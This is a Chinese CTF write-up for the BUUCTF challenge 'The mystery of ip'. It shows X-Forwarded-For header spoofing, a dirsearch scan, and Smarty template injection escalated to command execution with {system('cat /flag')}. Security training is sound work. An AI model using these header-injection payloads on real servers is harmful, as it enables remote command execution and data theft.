BUUCTF WEB [BJDCTF2020]The mystery of ip

• 在hint.php中找到一句注释

  <!-- Do you know why i know your ip? -->
  

• 在flag.php中看到自己的ip，联想到X-Forwarded-For。使用Hackbar添加一个HTTP头

  X-Forwarded-For: 127.0.0.1
  

  回显为

  Your IP is : 127.0.0.1 
  

  说明我们获得了可控变量

• 尝试命令注入失败，到这里就没什么思路了，尝试dirsearch看能不能获得什么信息

  # Dirsearch started Fri Apr 22 02:06:43 2022 as: dirsearch.py -u http://node4.buuoj.cn:28825/
  
  200     6KB  http://node4.buuoj.cn:28825/.DS_Store
  301   169B   http://node4.buuoj.cn:28825/css    -> REDIRECTS TO: http://node4.buuoj.cn/css/
  200     2KB  http://node4.buuoj.cn:28825/flag.php
  200   938B   http://node4.buuoj.cn:28825/header.php
  301   169B   http://node4.buuoj.cn:28825/img    -> REDIRECTS TO: http://node4.buuoj.cn/img/
  301   169B   http://node4.buuoj.cn:28825/libs    -> REDIRECTS TO: http://node4.buuoj.cn/libs/
  301   169B   http://node4.buuoj.cn:28825/templates_c    -> REDIRECTS TO: http://node4.buuoj.cn/templates_c/
  403   555B   http://node4.buuoj.cn:28825/templates_c/
  
  

  发现一个名为/template_c/ 的文件夹，怀疑存在模板注入

• 将X-Forwarded-For改为

  X-Forwarded-For: {6*6}
  

  回显为

  Your IP is : 36 
  

• 尝试直接读取flag文件

  X-Forwarded-For: {system('cat /flag')}
  

  回显

  Your IP is : flag{6a4bda77-d3d8-4117-ab44-b747d76eab0b} flag{6a4bda77-d3d8-4117-ab44-b747d76eab0b}